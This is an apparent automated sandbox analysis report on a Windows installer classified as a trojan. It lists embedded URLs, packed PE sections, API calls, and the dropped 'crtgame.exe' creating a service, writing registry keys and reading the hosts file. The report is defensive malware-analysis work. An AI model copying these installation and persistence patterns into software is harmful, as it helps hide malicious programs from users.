                  Source: is-1L7JU.tmp.1.drString found in binary or memory: http://LosslessAudio.org/0
                  Source: is-Q99K1.tmp.1.dr, is-KJFHV.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: is-LCCKT.tmp.1.dr, is-QASVM.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: is-Q99K1.tmp.1.dr, is-KJFHV.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                  Source: is-LCCKT.tmp.1.dr, is-QASVM.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: is-LCCKT.tmp.1.dr, is-QASVM.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: is-Q99K1.tmp.1.dr, is-KJFHV.tmp.1.drString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0
                  Source: is-U01MD.tmp.1.drString found in binary or memory: http://code.google.com/p/mp4v2D
                  Source: is-LCCKT.tmp.1.dr, is-QASVM.tmp.1.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                  Source: is-LCCKT.tmp.1.dr, is-QASVM.tmp.1.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                  Source: is-LCCKT.tmp.1.dr, is-QASVM.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: is-Q99K1.tmp.1.dr, is-KJFHV.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                  Source: is-LCCKT.tmp.1.dr, is-QASVM.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: is-LCCKT.tmp.1.dr, is-QASVM.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: is-Q99K1.tmp.1.dr, is-KJFHV.tmp.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                  Source: is-Q99K1.tmp.1.dr, is-KJFHV.tmp.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: is-Q99K1.tmp.1.dr, is-KJFHV.tmp.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                  Source: is-Q99K1.tmp.1.dr, is-KJFHV.tmp.1.drString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0
                  Source: is-Q99K1.tmp.1.dr, is-KJFHV.tmp.1.drString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
                  Source: is-LCCKT.tmp.1.dr, is-QASVM.tmp.1.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                  Source: is-MGR1O.tmp.1.drString found in binary or memory: http://lame.sf.net
                  Source: is-MGR1O.tmp.1.drString found in binary or memory: http://lame.sf.net32bits
                  Source: is-I69V3.tmp.1.drString found in binary or memory: http://mingw-w64.sourceforge.net/X
                  Source: is-LCCKT.tmp.1.dr, is-QASVM.tmp.1.drString found in binary or memory: http://ocsp.comodoca.com0
                  Source: is-LCCKT.tmp.1.dr, is-QASVM.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: is-LCCKT.tmp.1.dr, is-Q99K1.tmp.1.dr, is-KJFHV.tmp.1.dr, is-QASVM.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: is-Q99K1.tmp.1.dr, is-KJFHV.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0O
                  Source: is-LCCKT.tmp.1.dr, is-QASVM.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: is-LCCKT.tmp.1.dr, is-QASVM.tmp.1.drString found in binary or memory: http://ocsp.sectigo.com0
                  Source: is-Q99K1.tmp.1.dr, is-KJFHV.tmp.1.drString found in binary or memory: http://ocsps.ssl.com0
                  Source: is-Q99K1.tmp.1.dr, is-KJFHV.tmp.1.drString found in binary or memory: http://ocsps.ssl.com0Q
                  Source: is-Q99K1.tmp.1.dr, is-KJFHV.tmp.1.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: j9htknb7BQ.tmp, j9htknb7BQ.tmp, 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, j9htknb7BQ.tmp.0.dr, is-0C5FH.tmp.1.drString found in binary or memory: http://www.innosetup.com/
                  Source: is-MGR1O.tmp.1.drString found in binary or memory: http://www.mp3dev.org/
                  Source: is-MGR1O.tmp.1.drString found in binary or memory: http://www.mp3dev.org/ID3Error
                  Source: is-TN6ID.tmp.1.drString found in binary or memory: http://www.mpg123.de
                  Source: j9htknb7BQ.exe, 00000000.00000003.2046339269.0000000002138000.00000004.00001000.00020000.00000000.sdmp, j9htknb7BQ.exe, 00000000.00000003.2046177906.0000000002360000.00000004.00001000.00020000.00000000.sdmp, j9htknb7BQ.tmp, j9htknb7BQ.tmp, 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, j9htknb7BQ.tmp.0.dr, is-0C5FH.tmp.1.drString found in binary or memory: http://www.remobjects.com/ps
                  Source: j9htknb7BQ.exe, 00000000.00000003.2046339269.0000000002138000.00000004.00001000.00020000.00000000.sdmp, j9htknb7BQ.exe, 00000000.00000003.2046177906.0000000002360000.00000004.00001000.00020000.00000000.sdmp, j9htknb7BQ.tmp, 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, j9htknb7BQ.tmp.0.dr, is-0C5FH.tmp.1.drString found in binary or memory: http://www.remobjects.com/psU
                  Source: is-J4G02.tmp.1.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                  Source: is-O2JHA.tmp.1.drString found in binary or memory: https://gcc.gnu.org/bugs/):
                  Source: is-U01MD.tmp.1.drString found in binary or memory: https://mp4v2.googlecode.com/svn
                  Source: is-U01MD.tmp.1.drString found in binary or memory: https://mp4v2.googlecode.com/svn/trunk
                  Source: is-U01MD.tmp.1.drString found in binary or memory: https://mp4v2.googlecode.com/svn/trunkrepository
                  Source: is-U01MD.tmp.1.drString found in binary or memory: https://mp4v2.googlecode.com/svnrepository
                  Source: is-LCCKT.tmp.1.dr, is-QASVM.tmp.1.drString found in binary or memory: https://sectigo.com/CPS0
                  Source: is-NTP22.tmp.1.drString found in binary or memory: https://streams.videolan.org/upload/
                  Source: is-Q99K1.tmp.1.dr, is-KJFHV.tmp.1.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: is-Q99K1.tmp.1.dr, is-KJFHV.tmp.1.drString found in binary or memory: https://www.ssl.com/repository0

                  System Summary

                  Source: is-V4Q5G.tmp.1.drStatic PE information: section name:
                  Source: is-V4Q5G.tmp.1.drStatic PE information: section name:
                  Source: is-PA44V.tmp.1.drStatic PE information: section name:
                  Source: is-PA44V.tmp.1.drStatic PE information: section name:
                  Source: is-M6FGJ.tmp.1.drStatic PE information: section name:
                  Source: is-M6FGJ.tmp.1.drStatic PE information: section name:
                  Source: is-KJFHV.tmp.1.drStatic PE information: section name:
                  Source: is-KVRT3.tmp.1.drStatic PE information: section name:
                  Source: is-KVRT3.tmp.1.drStatic PE information: section name:
                  Source: is-L2U9S.tmp.1.drStatic PE information: section name:
                  Source: is-L2U9S.tmp.1.drStatic PE information: section name:
                  Source: is-Q99K1.tmp.1.drStatic PE information: section name:
                  Source: is-PE6Q4.tmp.1.drStatic PE information: section name:
                  Source: is-PE6Q4.tmp.1.drStatic PE information: section name:
                  Source: is-PE6Q4.tmp.1.drStatic PE information: section name:
                  Source: is-QRNOQ.tmp.1.drStatic PE information: section name:
                  Source: is-QRNOQ.tmp.1.drStatic PE information: section name:
                  Source: is-1GFJF.tmp.1.drStatic PE information: section name:
                  Source: is-1GFJF.tmp.1.drStatic PE information: section name:
                  Source: is-1GFJF.tmp.1.drStatic PE information: section name:
                  Source: is-OMTUV.tmp.1.drStatic PE information: section name:
                  Source: is-OMTUV.tmp.1.drStatic PE information: section name:
                  Source: is-RV1NR.tmp.1.drStatic PE information: section name:
                  Source: is-RV1NR.tmp.1.drStatic PE information: section name:
                  Source: is-7M8GD.tmp.1.drStatic PE information: section name:
                  Source: is-7M8GD.tmp.1.drStatic PE information: section name:
                  Source: is-7M8GD.tmp.1.drStatic PE information: section name:
                  Source: is-VNLOG.tmp.1.drStatic PE information: section name:
                  Source: is-VNLOG.tmp.1.drStatic PE information: section name:
                  Source: is-R3T6A.tmp.1.drStatic PE information: section name:
                  Source: is-R3T6A.tmp.1.drStatic PE information: section name:
                  Source: is-R3T6A.tmp.1.drStatic PE information: section name:
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0042F394 NtdllDefWindowProc_A,1_2_0042F394
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00423B94 NtdllDefWindowProc_A,1_2_00423B94
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_004125E8 NtdllDefWindowProc_A,1_2_004125E8
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0045678C PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,1_2_0045678C
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00477568 NtdllDefWindowProc_A,1_2_00477568
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0042E7A8: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,1_2_0042E7A8
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00454B00 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_00454B00
                  Source: C:\Users\user\Desktop\j9htknb7BQ.exeCode function: 0_2_0040840C0_2_0040840C
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00466ABC1_2_00466ABC
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0047EFD81_2_0047EFD8
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0043D5A41_2_0043D5A4
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0046F68C1_2_0046F68C
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0048C1101_2_0048C110
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_004301D01_2_004301D0
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_004442C41_2_004442C4
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0045E7EC1_2_0045E7EC
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0045A8941_2_0045A894
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_004449BC1_2_004449BC
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00468B441_2_00468B44
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00434B1C1_2_00434B1C
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00430D5C1_2_00430D5C
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00444DC81_2_00444DC8
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00484ED41_2_00484ED4
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_0045101C1_2_0045101C
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00443D1C1_2_00443D1C
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00485E081_2_00485E08
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_00433E181_2_00433E18
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_02301EE01_2_02301EE0
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_023043041_2_02304304
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_023011401_2_02301140
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: 1_2_023016B01_2_023016B0
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 5_2_004010515_2_00401051
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 5_2_00401CBD5_2_00401CBD
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BC5F147_2_02BC5F14
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BCEA067_2_02BCEA06
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BE48E97_2_02BE48E9
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BE28747_2_02BE2874
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BDE0657_2_02BDE065
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BD99447_2_02BD9944
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BDA6FA7_2_02BDA6FA
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BE4E607_2_02BE4E60
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BD7F027_2_02BD7F02
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BDD7597_2_02BDD759
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BDDC4D7_2_02BDDC4D
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BFB8067_2_02BFB806
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BFB85F7_2_02BFB85F
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BFBE1D7_2_02BFBE1D
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02BFBE577_2_02BFBE57
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: String function: 02BD85A0 appears 37 times
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: String function: 02BE4DF0 appears 137 times
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: String function: 004458F8 appears 59 times
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: String function: 00405964 appears 110 times
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: String function: 00445628 appears 45 times
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: String function: 00408C14 appears 45 times
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: String function: 00406ACC appears 39 times
                  Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmpCode function: String function: 00403400 appears 61 times
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: String function: 00433D30 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: String function: 004078FC appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: String function: 00457114 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: String function: 00403494 appears 82 times
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: String function: 004529A4 appears 91 times
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: String function: 00403684 appears 218 times
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: String function: 00456F08 appears 91 times
Source: j9htknb7BQ.exe | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: j9htknb7BQ.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: j9htknb7BQ.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: j9htknb7BQ.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: j9htknb7BQ.tmp.0.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
Source: crtgame.exe.1.dr | Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: is-0C5FH.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-0C5FH.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: is-0C5FH.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-0C5FH.tmp.1.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
Source: SpaceXRaces.exe.5.dr | Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: is-I69V3.tmp.1.dr | Static PE information: Number of sections : 11 > 10
Source: is-53LMN.tmp.1.dr | Static PE information: Number of sections : 11 > 10
Source: is-NTP22.tmp.1.dr | Static PE information: Number of sections : 11 > 10
Source: is-J4G02.tmp.1.dr | Static PE information: Number of sections : 18 > 10
Source: is-6AF6U.tmp.1.dr | Static PE information: Number of sections : 11 > 10
Source: is-4L1QL.tmp.1.dr | Static PE information: Number of sections : 11 > 10
Source: is-NFQ3O.tmp.1.dr | Static PE information: Number of sections : 11 > 10
Source: j9htknb7BQ.exe, 00000000.00000003.2046339269.0000000002138000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs j9htknb7BQ.exe
Source: j9htknb7BQ.exe, 00000000.00000003.2046177906.0000000002360000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs j9htknb7BQ.exe
Source: j9htknb7BQ.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: crtgame.exe.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: _RegDLL.tmp.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SpaceXRaces.exe.5.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: is-V4Q5G.tmp.1.dr | Static PE information: Section: ZLIB complexity 0.9964533211297071
Source: is-L2U9S.tmp.1.dr | Static PE information: Section: ZLIB complexity 0.9976058467741935
Source: is-PE6Q4.tmp.1.dr | Static PE information: Section: ZLIB complexity 0.995148689516129
Source: is-QRNOQ.tmp.1.dr | Static PE information: Section: ZLIB complexity 0.9908203125
Source: is-RV1NR.tmp.1.dr | Static PE information: Section: ZLIB complexity 0.9903624487704918
Source: is-7M8GD.tmp.1.dr | Static PE information: Section: ZLIB complexity 0.9891526442307692
Source: is-LCCKT.tmp.1.dr | Binary or memory string: ?..la..dll.Unknown error %u occurred.sln
Source: classification engine | Classification label: mal100.troj.evad.winEXE@15/128@1/2
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 7_2_02BD02C0 _memset,FormatMessageA,GetLastError,FormatMessageA,GetLastError, 7_2_02BD02C0
Source: C:\Users\user\Desktop\j9htknb7BQ.exe | Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 0_2_00409448
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: 1_2_00454B00 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 1_2_00454B00
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: 1_2_00455328 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA, 1_2_00455328
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: lstrcmpiW,GetModuleHandleA,GetModuleFileNameA,GetModuleHandleA,GetModuleFileNameW,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,CreateDirectoryA,CopyFileA,OpenSCManagerA,CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 5_2_00402548
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Code function: 1_2_0046D118 GetVersion,CoCreateInstance, 1_2_0046D118
Source: C:\Users\user\Desktop\j9htknb7BQ.exe | Code function: 0_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource, 0_2_00409BEC
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 5_2_004026F0 GetModuleHandleA,GetModuleFileNameA,GetCommandLineW,CommandLineToArgvW,GetLocalTime,lstrcmpiW,CreateFileA,CloseHandle,ExitProcess,lstrcmpiW,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,lstrcmpiW,RegCreateKeyExA,GetTickCount,wsprintfA,RegSetValueExA,RegCloseKey,SetEvent,ExitProcess,StartServiceCtrlDispatcherA, 5_2_004026F0
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | File created: C:\Program Files (x86)\CRTGame
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5408:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6548:120:WilError_03
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Mutant created: \Sessions\1\BaseNamedObjects\AnyMediaPlayer
Source: C:\Users\user\Desktop\j9htknb7BQ.exe | File created: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp
Source: C:\Users\user\Desktop\j9htknb7BQ.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: is-J4G02.tmp.1.dr | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: is-J4G02.tmp.1.dr | Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: is-J4G02.tmp.1.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: is-J4G02.tmp.1.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: is-J4G02.tmp.1.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: is-J4G02.tmp.1.dr | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: is-J4G02.tmp.1.dr | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: is-J4G02.tmp.1.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: is-J4G02.tmp.1.dr | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: j9htknb7BQ.exe | ReversingLabs: Detection: 39%
Source: j9htknb7BQ.exe | Virustotal: Detection: 58%
Source: C:\Users\user\Desktop\j9htknb7BQ.exe | File read: C:\Users\user\Desktop\j9htknb7BQ.exe
Source: unknown | Process created: C:\Users\user\Desktop\j9htknb7BQ.exe "C:\Users\user\Desktop\j9htknb7BQ.exe"
Source: C:\Users\user\Desktop\j9htknb7BQ.exe | Process created: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp "C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp" /SL5="$20464,6991381,54272,C:\Users\user\Desktop\j9htknb7BQ.exe"
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Query
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Process created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -i
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" helpmsg 10
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Process created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -s
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 10
Source: C:\Users\user\Desktop\j9htknb7BQ.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\j9htknb7BQ.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp | Section loaded: coreuicomponents.dll
